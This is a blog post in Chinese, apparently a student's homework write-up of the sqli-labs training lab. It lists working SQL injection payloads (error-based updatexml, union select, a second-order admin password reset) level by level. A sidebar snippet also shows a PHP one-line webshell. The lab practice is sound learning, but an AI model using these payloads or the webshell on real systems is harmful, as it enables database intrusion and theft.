我的网安作业5

已于 2024-09-02 15:09:30 修改
阅读量711 收藏 11
点赞数 10
文章标签: 数据库
于 2024-09-01 20:48:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76714452/article/details/141788467
版权

less11

弱口令猜测账号密码

判断闭合方式

判断列长

报错注入 查询当前数据库名

admin'  and updatexml(1,concat(1,database()),1) #

报错注入 查出网站的数据库里的目标表名

admin' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #

报错注入 查出目标表中的所有列名

admin' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' )),1) #

less12

与十一关差不多,闭合方式不同,闭合方式为:") #

然后重复十二关的注入方式

 查询当前数据库名

admin") and updatexml(1,concat(1,database()),1) #

 查出网站的数据库里的目标表名

admin") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #

 查出目标表中的所有列名

admin") and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

level 13

判断闭合方式,闭合方式为:') #

之后与之前两关一样

报错注入 查询当前数据库名

admin') and updatexml(1,concat(1,database()),1) #

报错注入 查出网站的数据库里的目标表名

admin') and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1) #

报错注入 查出目标表中的所有列名

admin') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

less14

判断闭方式,闭合方式为:" #

admin"and 1=1#

之后与之前一样

判断字段列数

报错注入 查询当前数据库名

admin" and updatexml(1,concat(1,database()),1) #

报错注入 查出网站的数据库里的目标表名

admin" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #

报错注入 查出目标表中的所有列名

admin" and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='security'and table_name='users' )),1) #

less 15

判断闭合方式

less 23

查询数据库名

id=-1' union select 1,database(),3 and '1' = '1

less24

在注册账号时可以输入特殊字符,例如admin'#

通过查看源码可以得知在修改密码时的闭合方式为‘#

修改密码,通过将admin闭合,之后的内容不执行,达成恒真条件,完成修改管理员密码的注入

less25

提示与or和and有关,发现or和and都被过滤掉了

 闭合方式为' --+

查询数据库名

?id=-1' union select 1,database(),3 --+

查询表名

由于本关卡过滤or,所以'information'需要写成‘infoorrmation’

?id=-1 ' union select 1, group_concat(table_name) ,3 from infoorrmation_schema.tables where table_schema='security' --+
 

less29

判断闭合方式  闭合方式为‘--+

爆库

id=-1' union select 1,(database()),3 --+

爆表

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

less30

闭合方式为”--+

联合注入,爆库

?id=-1" union select 1,database(),3 --+

联合注入,爆表

?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

2301_76714452
关注
我的网安作业
wwp的博客
01-31 118
一 Sqli-labs: 由于是完全的新手,所以有很多都不太了解,嗯sqli-labs我做了第一第二第三关,原理都差不多所以以第三关为例: 不知道为什么我的PHPstudy启动总是有问题。 于是每次都得自己手动开启MySQL的服务: 好了启动成功,开始进入正题。 2021/1/31: 1.判断是否有SQL注入 http://127.0.0.1/sqli/Less-3/?id=1 http://127.0.0.1/sqli/Less-3/?id=1’ 由于两次结果的显示明显不同,因此判断存在SQL注入漏
我的网安作业2/21
wwp的博客
02-21 111
一、SQL-labs Less8 1.判断是否存在SQL注入 http://127.0.0.1/sqli/Less-8/?id=1 http://127.0.0.1/sqli/Less-8/?id=1' 由两次结果可知,存在SQL注入问题。 2.构造正确的SQL语句 http://127.0.0.1/sqli/Less-8/?id=1' --+ 3.开始猜解表名 由于是布尔盲注,手动实在是太慢了,我觉得用burpsuite爆破都很麻烦,但是我自己的代码能力又很差,唉,彷佛看到了我的网安之路的终点
我的网安作业4
2301_76714452的博客
09-01 254
alert(1)
我的网安作业7
2301_76714452的博客
09-05 154
upload-labs靶场。
我的网安作业2
2301_76714452的博客
08-27 186
在这个登录界面用burpsuite代理进行拦截。选择攻击类型,配置插入位置。导出后生成表格下载表格。二.简单的表单暴力破解。
网安作业2
m0_70187377的博客
08-27 197
在插入文件功能内可以看到一个文件夹进入var/www/html路径可以看到之后访问url+/nothinghere/fl000g.txt得到flag。在url后面加/www.zip可以下载得到源文件,文件提示flag,in fl000g.txt,访问得到flag。访问url+/tz.php得到页面进入PHP参数一栏,点击phpinfo CTRL+F搜索flag。访问url+/db/db.mdb,下载文件,打开文件之后搜索flag,成功找到flag。通过在url后加/.svn访问得到flag。
网安作业1
dsahah的博客
07-12 107
接1/0/21/0/4建立需要区域办公区生产区游客区完成用户管理市场部研发部办公区-研发部办公区-市场部完成登录建立用户。
我的网安作业2/14
wwp的博客
02-14 127
一、sql-labs Less7 1.前期准备 在PHPstudy下的PHPTutorial/mysql/my.ini文件里面添加一句。(为了后期支持文件的读写) 2.一句话木马 在phpStudy\PHPTutorial\WWW的文件夹下新建一句话木马文本。 根据后面出现的bug,正确的语句应该是: <?php @eval($_POST["a"]);?> 启动中国菜刀: 连接木马: 两个基本函数:load_file()读取本地文件;into outfile 写文件。 3.判断是否存在
我的网安作业2/7
wwp的博客
02-07 160
一、sqli-labs less4: 打开less4的index.php文件,在SQL语句下添加如下两句: echo $sql; echo "<br>"; 1.判断是否存在注入: http://127.0.0.1/sqli/Less-4/?id=1 http://127.0.0.1/sqli/Less-4/?id=1'显式正确 http://127.0.0.1/sqli/Less-4/?id=1"显式不正确 得到报错信息: 根据报错信息构造正确的SQL语句: http://127.0.0
东南大学网安学院模式识别作业答案&考试真题回忆版
02-26
这门课很简单,可以翘课,跟着PPT自学就行,但是课后作业是重中之重,考试范围的百分之九十都是从做过的作业里面变式。无论你有多摆,请认真对待这门课的作业,因为他量很少,但是很有用!期末的真题回忆的很粗糙,...
作业复习】 网安.docx
09-19
作业复习】 网安.docx
周玉川-2017221302006-网安技术第七次作业1
08-08
周玉川同学的第七次作业主要探讨了入侵检测的分类、主要技术指标以及未知攻击检测方法,并提出了一个实践性的课后练习。 1. 入侵检测的分类: - 异常检测模型(Anomaly Detection):这种模型依赖于对正常行为的...
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
程序员阿龙的博客
09-22 4428
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Online DDL (Data Definition Language)
09-23 256
是MySQL中的一个功能,允许在修改表结构(如添加、删除或修改列)的同时,允许对表进行并发读写操作。在传统的DDL操作中,对表结构的修改会导致整个表被锁定,从而阻止其他事务对该表进行读写操作,这可能导致长时间的锁定和性能问题。Online DDL的引入解决了这个问题,它允许在修改表结构的同时,保持对表的并发访问。MySQL从5.6版本开始引入了Online DDL的部分功能,而在8.0版本中对Online DDL进行了进一步的优化。
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 718
在Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
JPA+Thymeleaf增删改查
y050505的博客
09-25 450
在使用JPA(Java Persistence API)和Thymeleaf作为模板引擎进行Web开发时,实现增删改查(CRUD)操作是一个常见的需求。下面,我将简要介绍如何使用Spring Boot框架结合JPA和Thymeleaf来实现这一功能。
k8s搭建一主三从的mysql8集群---无坑
oopxiajun博客专栏
09-27 264
对于构建基于MySQL的大规模、高性能应用来讲,需要使用水平扩展(集群)的数据库架构方式。在MySQL内建的复制功能可以实现,通过为服务器配置一个或多个备库的方式来进行数据同步。同时复制功能不仅有利于构建高性能的应用,也是高可用性、可扩展性、容灾、备份以及数据仓库等工作的基础。复制的基本原理是让一台服务器的数据与其他服务器保持同步。一台主库的数据可以同步到多台备库上,备库本身也可以被配置成另外一台服务器的主库。主库和备库之间可以有多种不同的组合方式。
[EBPF] 实时捕获DM数据库是否存在SQL阻塞
最新发布
飞奔的屎壳郎
09-27 578
名称版本linux版本(centos8.5)DM88.1.4.27python利用ebpf技术在不登录数据库的情况下,通过对数据库的函数添加钩子,实时的对数据库是否存在阻塞判断现有的监控逻辑都是新建数据库用户执行SQL语句来判断阻塞情况,告警的实时性取决于监控的周期频率,而使用ebpf技术能够解决这个痛点ebpf有多种实现方式,这里便于理解测试的话 使用python语言内置c语言的形式进行了说明。涉及到生产环境应该是使用go语言或者c语言去做能够有效避免源码泄露等问题。
github网安项目
04-24
GitHub是一个基于Web的代码托管平台,它提供了版本控制和协作功能,让开发者可以方便地共享和管理代码。在GitHub上,有很多与网安相关的项目,这些项目致力于保护网络安全、防止黑客攻击和提高系统的安全性。以下是一些常见的GitHub网安项目: 1. OWASP(开放式Web应用程序安全项目):OWASP是一个致力于提高Web应用程序安全性的国际组织。他们在GitHub上维护了一系列开源项目,包括安全工具、漏洞测试和安全指南等。 2. Metasploit:Metasploit是一个广泛使用的渗透测试框架,它提供了一系列工具和资源,帮助安全专家评估和增强系统的安全性。Metasploit在GitHub上有一个官方仓库,开发者可以在这里获取最新的代码和贡献自己的改进。 3. Snort:Snort是一个开源的入侵检测系统(IDS),它可以监测网络流量并检测潜在的攻击行为。Snort的代码托管在GitHub上,开发者可以参与到项目中,改进和定制自己的IDS规则。 4. Nmap:Nmap是一个网络扫描和主机发现工具,它可以帮助安全专家评估网络的安全性。Nmap的源代码也在GitHub上开放,用户可以自由地访问和贡献代码。 5. Security Shepherd:Security Shepherd是一个教育性的Web应用程序,旨在帮助开发者学习和理解常见的Web安全漏洞。它提供了一系列的挑战和实验,供用户测试和提高自己的安全技能。Security Shepherd的代码也在GitHub上开源。 这些项目只是GitHub上众多网安项目的一小部分,你可以通过在GitHub上搜索关键词来找到更多与网安相关的项目。希望这些信息对你有帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值